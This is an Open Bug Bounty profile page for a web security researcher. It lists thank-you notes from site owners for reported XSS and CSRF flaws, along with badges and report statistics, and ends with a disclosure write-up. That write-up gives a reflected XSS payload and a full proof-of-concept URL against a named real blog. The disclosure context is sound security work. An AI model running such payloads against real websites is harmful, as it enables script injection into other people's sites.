Researcher reputation:  1230

Real name:
TAHA SMILY

About me:
Our Democracy has been Hacked ! F**K society

How to contact me:
this is my email adresse : [email protected]

Alternative Contacts:
https://www.linkedin.com/in/taha-smily-195aa3145/

Experience in Application Security
3-5 years

Award / Bug Bounty I prefer:
I prefer :
- Rewards
- Benefits Gifts
- Swag
- Hall of Fame
- Acknowledgment
- PayPal Money


Anything that you wish to award me will motivate me to continue doing what I'm doing

Follow me on:
Twitter
LinkedIn

Recommendations and Acknowledgements | Full List:

    6 December, 2019

     Buchabstauber OJS Team from UNIVIE:

We would like to thank you for your valuable contribution in finding the XSS issue on our site! You have been very helpful!

    3 December, 2019

     ziduniwien Zentraler Informatikdienst from University of Vienna:

Dear ELProfesor, The University of Vienna would like to thank you for your valuable contribution in finding a website security issue. Your input is highly welcome and helps to raise the security level of our educational institution. Servus and greetings from Vienna, Austria.

    21 November, 2019

     nomuthetart nab8 from [email protected]:

Very responsive and provided clear information about what they had found.

    11 November, 2019

     fislerdata fislerdata from fislerdata:

Thank you for the assistance. Clearly stated issue, clear report. Thank you for your work

    28 October, 2019

     BDUe_Fachverlag Nadine from BDÜ Fachverlag:

Helpful information and report. We appreciate the quick feedback. Thanks!

    1 October, 2019

     r_c_claxton Richard :

Thank you for identifying a vulnerability on our site!

    20 September, 2019

     ashleyhindle Ashley from C&C:

Thank you so much for highlighting the vulnerability, it really helped!

    11 September, 2019

     ziduniwien Computer Center from University of Vienna:

Dear ELProfesor, The University of Vienna would like to thank you for your valuable contribution in finding a website security issue. Your input is highly welcome and helps to raise the security level of our educational institution. Servus and greetings from Vienna, Austria.

    10 September, 2019

     JamieForster JamieEff :

Thank you so much for highlighting the vulnerability - you're doing an amazing job!

    7 September, 2019

     dusalnet Blogmn.net from Blogmn.net:

Thank you for identifying the XSS issue on my site! You have been very helpful!

    6 September, 2019

     fisher_of_men11 Andy from Mudconnector:

Thank you for identifying the XSS issue on my site! You have been very helpful!

    4 September, 2019

     AndyTrier Andreas from KV Trier-Saarburg:

Thanks for help fixing issues. Fast communication he make a good job.

    3 September, 2019

     dsmithgard Dan Smith from Patton Electronics:

Very helpful in fixing an XSS problem on our website.

    20 August, 2019

     runlevelone Per :

Thank you for the reported vulnerability! I thought I had those XSS pitfalls covered, but aparently not.

    15 August, 2019

     randomthing4ev1 randomthing4ev1 from Name withheld:

Thank you for finding XSS on one of our websites.

    29 July, 2019

     testmynet Damon from TestMy.net:

Thank you again! Nice find.

    25 July, 2019

     testmynet Damon from TestMy.net:

Thank you for pointing out a variable that needed to be escaped.

    29 May, 2019

     fukubacchi Yoshiki from IM:

Thank you very much for reporting the issue. It has been patched.

    15 May, 2019

     Shopweezle Andreas from Company:

Thanks for help fixing issues. Fast communication; good job.

    12 May, 2019

     CouriernetI Alexander Janussek from Couriernet GmbH:

Thanks to the detailed information ELProfesor gave us, we could fix our vulnerabilities on our website. Very friendly and professional responses to our mails helped us a great deal. Thanks again. Great job.

    6 May, 2019

     straysan Martin from undisclosed:

Thanks for the heads up, ElProfesor. We appreciate the responsible disclosure.

    18 April, 2019

     SoftwareDlp Ingo from dlp software:

Dear Taha, thank you for reporting XSS vulnerability on our site, was very helpful

    26 February, 2019

     felixbuenemann Felix Bünemann from LOUIS INTERNET:

Responsibly disclosed an XSS problem in a customer's website with working PoC that could quickly be fixed.

    2 January, 2019

     SOSLaChapelle Dev from QL:

Thanks for the information and report. The issue has been patched.

    28 November, 2018

     jcopley Joe Copley from Copley Internet Systems:

Thank you very much for informing us about a security vulnerability on our site. It has been patched. Keep up the good work!

    24 November, 2018

     laviavigdor Lavi from Simania:

Thank you for reporting XSS issues. It's patched now.

    21 November, 2018

     dJoceNet Jocelyn from eiffel.org:

Thank you for notifying us of the issue and check it was fixed!

    19 November, 2018

     doccry Thorsten from digenial GmbH:

Many thanks for your XSS reporting

    13 November, 2018

     HoutVasthouden Bert from Woodwize:

Thank you for reporting XSS issues. It's patched now.

    31 October, 2018

     davidbehler David from PrepLounge:

Thank you very much for informing us about a XSS vulnerability.

    24 October, 2018

     VytautasKr Vytautas from not-disclosed:

Thank you for taking the time and notifying about the issue in a responsible fashion!

    16 October, 2018

     euvtechnology euvtechnology from Engel & Völkers Technology:

Dear Taha, Thank you for reporting the XSS vulnerability you discovered on our website and helping us ensuring the security of our webservices.

    14 October, 2018

     HezMonaghan Hez from JS:

Super quick to reply, open and transparent. HUGE thanks to pointing out some issues!

    10 October, 2018

     whitedataDE Dominik from whitedata Holding GmbH:

Thank you for your XSS report and fast response

    3 October, 2018

     astroseekcom Petr9 from Astro-Seek.com:

Thank you for reporting XSS issues. It's patched now.

    24 September, 2018

     Paruzzi_webm Pim from Paruzzi:

He pointed out a problem in our seo url structure and we managed to fix the problem

    18 September, 2018

     iwayAG Matthias Cramer from iway AG:

Thanks for the detailed report and the fast ans competent communication.

    17 September, 2018

     DCB_Singapore Mike from dreamcareerbuilder.com:

I would like to thank Taha for his help to discover the security in our website, without his help we couldn't locate it or even solve it. Many thanks.

    17 September, 2018

     PAOK_FC Nikos S. from PAOK:

Thank you very much for informing us about the vulnerability and the help in fixing it!

    3 September, 2018

     ROWeb_Ian Ian from Rochdale Online:

Thanks Taha for your assistance and professionalism when identifying an XSS vulnerability.

    22 August, 2018

     wirthundhorn Support from dtv.de:

Thank you very much helping us fixing CSRF vulnerability.

    17 August, 2018

     frecl Frank from Reclam:

Taha provided quick and fair information on a vulnerability, so we could fix the problem very quickly. Thanks very much!

    16 August, 2018

     MaartenCouvreur Maarten from Cocrecom:

Thank you for reporting an XSS issue!

    23 July, 2018

     cyberday_gmbh D. Loy from CYBERDAY GmbH:

Thanks for reporting XSS issues

    22 July, 2018

     scrmetal Robby from Supreme Chaos Records:

Thank you for you immediate answer on questions and keep on on discovering!

    2 July, 2018

     AneSybesma Ane from BHZNet.nl:

TAHA founda XSS vulnerability. Thanks!

    20 June, 2018

     teamhively Julian from Hively:

Thanks Taha for reporting an issue and for your prompt and clear communication.

    20 June, 2018

     lordlink lordlink from SQLI:

Thank you Taha for your efforts in making the web safer.

    14 June, 2018

     husamb Husamettin Batur from Sporx:

Thank you very much for informing XSS vulnerability in our website. Good work!

    13 June, 2018

     SandiSchleicher SSchleicher from iConsumer:

Thank you Taha for your help identifying potential security issues. We appreciate your help in making our service more secure for our members and visitors.

    4 June, 2018

     digisolid Martin Otte from Klik-info.nl:

TAHA helped us to find a XSS vulnerability. Thanks!

    29 May, 2018

     iboulard Isabelle Boulard from CarpoolWorld:

Hi Taha, Thank you for reporting this XSS vulnerability on our site!

    27 May, 2018

     remecz RZs from Pressflex:

Thank you Taha for spotting a XSS exploit. We appreciated the quick communication and information to help us resolve the issue promptly!

    27 May, 2018

     ClementBourgoin Clément from Biblys:

Thanks for helping me discover an XSS bug.

    22 May, 2018

     aartvdwerf Aart from OI:

Thanks for letting us know about this XSS vulnerability. We appreciate the quick feedback.

    11 May, 2018

     bobthenob Bob Kolk from Tumbl Trak:

Thank you for the heads-up on our XSS issue!

    8 May, 2018

     JayGilmore Jay Gilmore from MODX Systems:

We really appreciated the report and the fast communication with regard to our site issue. Taha is an excellent security professional.

    4 May, 2018

     dsmithgard Dan Smith from Patton Electronics:

Thanks for alerting me to the vulnerability and providing a detailed explanation of the issue and how to reproduce it.

    25 April, 2018

     dezertdezine Leon Miller from Dezert Dezine:

Thanks for letting us know about this XSS vulnerability. We appreciate the quick feedback.

    6 April, 2018

     tobyweston Toby from ELA:

Thanks to Taha for spotting a XSS exploit - We appreciated the feedback and information to help us resolve the issue promptly!

    9 March, 2018

     fsocietyssl Andrew from Wiley:

TAHA, Thank you for being very professional and catching the vulnerability. Thank you for doing an exceptional job!

    6 March, 2018

     MedmediaDev mmDev from MMC:

Many thanks, Taha, for your expedient response and explanation of the XSS issue. Thumbs up for the good guys, and Openbugbounty service in general!

    30 January, 2018

     studisonline Oliver Iost from Studis Online:

Thanks to Taha for quickly sending me detailed information about the vulnerabilities. So it was easy to fix it soon.

    24 January, 2018

     nietofarias Ignacio Nieto from Despegar.com:

Thanks Taha for your findings at Despegar.com. Keep up the good work!

    16 January, 2018

     TUHamburg Webmaster from TUHH:

Thanks for finding a XSS vulnerability and your fast and thorough feedback

    16 January, 2018

     bishwadeepkc Bishwadeep KC from Career FAQs:

Thank you Taha for responding so Promptly. I really appreciate your work.

    9 January, 2018

     RobMcGregor4 Rob McGregor from VERIZON:

Indeed professional, rapid to respond, and we do look forward to working together for any future issues identified. Keep up the good work!! VERIZON ASIRT

    3 January, 2018

     _lockton_ Laurence Lockton from University of Bath:

Thank you TAHA for you quick response

    8 December, 2017

     busuuTech Rob Elkin from busuu:

Thanks for catching a vulnerability and notifying us! Great and speedy communication!

    5 December, 2017

     Mr_Papercut Mischa from Symbaloo:

Taha responded quickly to our questions, was very clear in pointing out the flaws he found, and thanks to his help we were able to deploy a fix within 24 hours. Thanks again TAHA!

    29 November, 2017

     AdamHessDev Adam from Brooklyn Law School:

TAHA was very quick to respond and clear about instructions for recreating the issue.

    23 November, 2017

     supportdi31 Patrick from Depeche Interactive:

Thanks to TAHA, one XSS vulnerability has been identified and resolved quickly. Greak work !

    14 November, 2017

     khusroks Khusro K from Projectmanagement:

Taha is courteous, quick, professional, and diligent in investigating vulnerabilities. We appreciated his help in quickly resolving the issues he identified.

    9 November, 2017

     colleo_fr Eric Rayer from Colleo:

Un grand merci à Taha qui nous a permis de combler une faille XSS, et nous a réouvert les yeux sur le reste. Aujourd'hui tout est propre :-)

    30 October, 2017

     _patryks_ Patryk from n/a:

Thanks for the feedback and help TAHA!

    27 October, 2017

     notedekd Waroros Rojana from Dek-D:

Very quick and informative reporting. Appreciate your great effort.

    25 October, 2017

     ArnY Anraud Abélard from Université de Nantes:

This researcher was very professional, efficient and quick to reply. Thanks for your work.

    23 October, 2017

     itea97137491 Vincent from n/a:

TAHA, quick response and very helpful to find our XSS issue. Thank you!

    23 October, 2017

     PK16MS Paul Kurzin from Vash Magazin:

TAHA was very helpful in discovering important vulnerabilities. Thank you for your work!

    19 October, 2017

     fsocietyssl Andrew Taitt from Wiley:

TAHA was very professional and helpful with reporting his findings. We appreciate your great work!

    19 October, 2017

     DeanHalter Dean Halter from University of Dayton:

Appreciate Taha's efforts. Had the expertise to identify a vulnerability and the professionalism to handle disclosure/mitigation appropriately. Great work.

    16 October, 2017

     rmwb Ross M. W. Bennetts from University of New England, Australia:

Prompt and professional, TAHA has been very helpful in detecting XSS issues and assisting us to resolve these issues.

Honor Badges

Number of Secured Websites

10+ Websites	50+ Websites	500+ Websites	WEB SECURITY VETERAN 1000+ Websites

Advanced Security Research

WAF Bypasser	CSRF Master 30+ Reports	AppSec Logic Master 30+ Reports	Fastest Fix Fix in 24 hours

Outstanding Achievements

Secured OBB	OBB Advocate	Improved OBB

Commitment to Remediate and Patch

Patch Master 55% Patched	Patch Guru 65% Patched	Patch Lord 75% Patched

Recommendations and Recognition

REPUTABLE 10+ Recommends	FAMOUS 25+ Recommends	GLOBALLY TRUSTED 50+ Recommends

Distinguished Blog Author

1 Post	3 Posts	5+ Posts

Research Statistics

Total reports:	7383
Total reports on VIP sites:	1598
Total patched vulnerabilities:	2255
Total vulnerabilities on Hold (Open Bug Bounty):	1030
Recommendations received:	82
Active since:	12.10.2017
Top VIP Security Researcher Awards:	Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week

Open Bug Bounty Certificate

27.11.2019  Reflected xss in 360totalsecurity

i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce :

Go to https://blog.360totalsecurity.com

and To : https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x"><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x"><svG onLoad=prompt(document.domain)>

Regards,

TAHA

21.11.2019  blind xss in apple

This is my report about blind xss in apple via user agent